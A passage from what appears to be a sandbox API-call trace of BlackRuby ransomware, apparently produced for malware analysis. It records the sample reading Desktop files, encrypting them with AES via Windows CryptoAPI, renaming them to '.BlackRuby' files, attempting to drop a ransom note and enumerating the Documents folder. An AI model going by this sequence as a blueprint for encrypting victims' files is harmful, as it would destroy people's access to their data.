lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", lpFilePart=0x0) returned 0x47 [0057.374] GetLastError () returned 0x5 [0057.374] SetErrorMode (uMode=0x1) returned 0x0 [0057.374] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zh54_r9.odt"), fInfoLevelId=0x0, lpFileInformation=0x1b3427c | out: lpFileInformation=0x1b3427c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7964f6f0, ftCreationTime.dwHighDateTime=0x1d351a5, ftLastAccessTime.dwLowDateTime=0x54543810, ftLastAccessTime.dwHighDateTime=0x1d35634, ftLastWriteTime.dwLowDateTime=0x54543810, ftLastWriteTime.dwHighDateTime=0x1d35634, nFileSizeHigh=0x0, nFileSizeLow=0x117b5)) returned 1 [0057.374] GetLastError () returned 0x5 [0057.374] SetErrorMode (uMode=0x0) returned 0x1 [0057.374] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", lpFilePart=0x0) returned 0x47 [0057.374] GetLastError () returned 0x5 [0057.374] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", lpFilePart=0x0) returned 0x47 [0057.374] GetLastError () returned 0x5 [0057.374] SetErrorMode (uMode=0x1) returned 0x0 [0057.374] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zh54_r9.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.374] GetLastError () returned 0x0 [0057.374] GetFileType (hFile=0x184) returned 0x1 [0057.374] SetErrorMode (uMode=0x0) returned 0x1 [0057.374] GetFileType (hFile=0x184) returned 0x1 [0057.375] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x117b5 [0057.375] GetLastError () returned 0x0 [0057.375] ReadFile (in: hFile=0x184, lpBuffer=0x1b3648c, nNumberOfBytesToRead=0x117b5, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1b3648c*, lpNumberOfBytesRead=0x18ec40*=0x117b5, lpOverlapped=0x0) returned 1 [0057.375] GetLastError () returned 0x0 [0057.376] CloseHandle (hObject=0x184) returned 1 [0057.376] GetLastError () returned 0x0 [0057.376] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", lpFilePart=0x0) returned 0x47 [0057.376] GetLastError () returned 0x0 [0057.376] SetErrorMode (uMode=0x1) returned 0x0 [0057.376] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zh54_r9.odt"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7964f6f0, ftCreationTime.dwHighDateTime=0x1d351a5, ftLastAccessTime.dwLowDateTime=0x54543810, ftLastAccessTime.dwHighDateTime=0x1d35634, ftLastWriteTime.dwLowDateTime=0x54543810, ftLastWriteTime.dwHighDateTime=0x1d35634, nFileSizeHigh=0x0, nFileSizeLow=0x117b5)) returned 1 [0057.376] GetLastError () returned 0x0 [0057.376] SetErrorMode (uMode=0x0) returned 0x1 [0057.376] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c818) returned 1 [0057.376] GetLastError () returned 0x0 [0057.411] CryptImportKey (in: hProv=0x37c818, pbData=0x1bb37d4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360da0) returned 1 [0057.411] GetLastError () returned 0x0 [0057.411] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.411] GetLastError () returned 0x0 [0057.416] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.416] GetLastError () returned 0x0 [0057.416] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360de0) returned 1 [0057.416] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.416] GetLastError () returned 0x0 [0057.416] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1be0820*=0x1, dwFlags=0x0) returned 1 [0057.416] GetLastError () returned 0x0 [0057.416] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1be07ec, dwFlags=0x0) returned 1 [0057.416] GetLastError () returned 0x0 [0057.416] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1be0868*, pdwDataLen=0x18ec30*=0x118b0, dwBufLen=0x118b0 | out: pbData=0x1be0868*, pdwDataLen=0x18ec30*=0x118b0) returned 1 [0057.417] GetLastError () returned 0x0 [0057.417] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c039f4*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c039f4*, pdwDataLen=0x18ec48*=0x10) returned 1 [0057.417] GetLastError () returned 0x0 [0057.417] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c03a24*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c03a24*, pdwDataLen=0x18ec50*=0x10) returned 1 [0057.417] GetLastError () returned 0x0 [0057.418] CryptDestroyKey (hKey=0x360da0) returned 1 [0057.418] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.418] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.418] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", lpFilePart=0x0) returned 0x47 [0057.418] GetLastError () returned 0x0 [0057.418] SetErrorMode (uMode=0x1) returned 0x0 [0057.418] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zh54_r9.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.419] GetLastError () returned 0xb7 [0057.419] GetFileType (hFile=0x184) returned 0x1 [0057.419] SetErrorMode (uMode=0x0) returned 0x1 [0057.419] GetFileType (hFile=0x184) returned 0x1 [0057.421] CloseHandle (hObject=0x184) returned 1 [0057.421] GetLastError () returned 0xb7 [0057.421] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt", lpFilePart=0x0) returned 0x47 [0057.421] GetLastError () returned 0xb7 [0057.421] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_7EaXLw06EjfgDAMpJrJC3w8RogB08ClOtiPqE9t24mjuHf5.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_7EaXLw06EjfgDAMpJrJC3w8RogB08ClOtiPqE9t24mjuHf5.BlackRuby", lpFilePart=0x0) returned 0x7f [0057.421] GetLastError () returned 0xb7 [0057.421] SetErrorMode (uMode=0x1) returned 0x0 [0057.421] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zh54_r9.odt"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7964f6f0, ftCreationTime.dwHighDateTime=0x1d351a5, ftLastAccessTime.dwLowDateTime=0x54543810, ftLastAccessTime.dwHighDateTime=0x1d35634, ftLastWriteTime.dwLowDateTime=0x2a6af560, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x118c0)) returned 1 [0057.421] GetLastError () returned 0xb7 [0057.421] SetErrorMode (uMode=0x0) returned 0x1 [0057.421] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zh54_r9.odt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zh54_r9.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_7EaXLw06EjfgDAMpJrJC3w8RogB08ClOtiPqE9t24mjuHf5.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\encrypted_7eaxlw06ejfgdampjrjc3w8rogb08clotipqe9t24mjuhf5.blackruby")) returned 1 [0057.421] GetLastError () returned 0xb7 [0057.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x54 [0057.422] GetLastError () returned 0xb7 [0057.422] SetErrorMode (uMode=0x1) returned 0x0 [0057.422] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.422] GetLastError () returned 0x5 [0057.423] SetErrorMode (uMode=0x0) returned 0x1 [0057.423] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", lpFilePart=0x0) returned 0x46 [0057.423] GetLastError () returned 0x5 [0057.423] SetErrorMode (uMode=0x1) returned 0x0 [0057.423] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zhlsmo.wav"), fInfoLevelId=0x0, lpFileInformation=0x1c327d0 | out: lpFileInformation=0x1c327d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd7c8f30, ftCreationTime.dwHighDateTime=0x1d34f40, ftLastAccessTime.dwLowDateTime=0x102097f0, ftLastAccessTime.dwHighDateTime=0x1d35a63, ftLastWriteTime.dwLowDateTime=0x102097f0, ftLastWriteTime.dwHighDateTime=0x1d35a63, nFileSizeHigh=0x0, nFileSizeLow=0xa55c)) returned 1 [0057.423] GetLastError () returned 0x5 [0057.423] SetErrorMode (uMode=0x0) returned 0x1 [0057.423] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", lpFilePart=0x0) returned 0x46 [0057.423] GetLastError () returned 0x5 [0057.423] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", lpFilePart=0x0) returned 0x46 [0057.423] GetLastError () returned 0x5 [0057.423] SetErrorMode (uMode=0x1) returned 0x0 [0057.423] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zhlsmo.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.423] GetLastError () returned 0x0 [0057.424] GetFileType (hFile=0x184) returned 0x1 [0057.424] SetErrorMode (uMode=0x0) returned 0x1 [0057.424] GetFileType (hFile=0x184) returned 0x1 [0057.424] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xa55c [0057.424] GetLastError () returned 0x0 [0057.424] ReadFile (in: hFile=0x184, lpBuffer=0x1c345b0, nNumberOfBytesToRead=0xa55c, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1c345b0*, lpNumberOfBytesRead=0x18ec40*=0xa55c, lpOverlapped=0x0) returned 1 [0057.424] GetLastError () returned 0x0 [0057.425] CloseHandle (hObject=0x184) returned 1 [0057.425] GetLastError () returned 0x0 [0057.425] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", lpFilePart=0x0) returned 0x46 [0057.425] GetLastError () returned 0x0 [0057.425] SetErrorMode (uMode=0x1) returned 0x0 [0057.425] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zhlsmo.wav"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd7c8f30, ftCreationTime.dwHighDateTime=0x1d34f40, ftLastAccessTime.dwLowDateTime=0x102097f0, ftLastAccessTime.dwHighDateTime=0x1d35a63, ftLastWriteTime.dwLowDateTime=0x102097f0, ftLastWriteTime.dwHighDateTime=0x1d35a63, nFileSizeHigh=0x0, nFileSizeLow=0xa55c)) returned 1 [0057.425] GetLastError () returned 0x0 [0057.425] SetErrorMode (uMode=0x0) returned 0x1 [0057.435] CryptImportKey (in: hProv=0x37c680, pbData=0x1ca343c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360aa0) returned 1 [0057.435] GetLastError () returned 0x0 [0057.435] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.435] GetLastError () returned 0x0 [0057.440] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.441] GetLastError () returned 0x0 [0057.441] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360d20) returned 1 [0057.441] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.441] GetLastError () returned 0x0 [0057.441] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1cd0488*=0x1, dwFlags=0x0) returned 1 [0057.441] GetLastError () returned 0x0 [0057.441] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1cd0454, dwFlags=0x0) returned 1 [0057.441] GetLastError () returned 0x0 [0057.441] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd04d0*, pdwDataLen=0x18ec30*=0xa650, dwBufLen=0xa650 | out: pbData=0x1cd04d0*, pdwDataLen=0x18ec30*=0xa650) returned 1 [0057.441] GetLastError () returned 0x0 [0057.441] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce519c*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1ce519c*, pdwDataLen=0x18ec48*=0x10) returned 1 [0057.441] GetLastError () returned 0x0 [0057.441] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce51cc*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1ce51cc*, pdwDataLen=0x18ec50*=0x10) returned 1 [0057.441] GetLastError () returned 0x0 [0057.442] CryptDestroyKey (hKey=0x360aa0) returned 1 [0057.442] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.442] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav", lpFilePart=0x0) returned 0x46 [0057.442] GetLastError () returned 0x0 [0057.442] SetErrorMode (uMode=0x1) returned 0x0 [0057.443] GetFileType (hFile=0x184) returned 0x1 [0057.443] GetFileType (hFile=0x184) returned 0x1 [0057.444] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\zHLSMo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\zhlsmo.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\ygM6v- ZLcCJ1\\Encrypted_t6clP1iuZMMzf5iaS9VRZsX347I8yY0I59RmGBZ77f.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\ygm6v- zlccj1\\encrypted_t6clp1iuzmmzf5ias9vrzsx347i8yy0i59rmgbz77f.blackruby")) returned 1 [0057.445] GetLastError () returned 0xb7 [0057.446] SetErrorMode (uMode=0x0) returned 0x1 [0057.446] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.446] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.446] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.447] GetLastError () returned 0x5 [0057.447] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0057.447] GetLastError () returned 0x12 [0057.447] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0057.447] SetErrorMode (uMode=0x0) returned 0x1 [0057.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents", lpFilePart=0x0) returned 0x1a [0057.447] GetLastError () returned 0x12 [0057.447] SetErrorMode (uMode=0x1) returned 0x0 [0057.447] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, 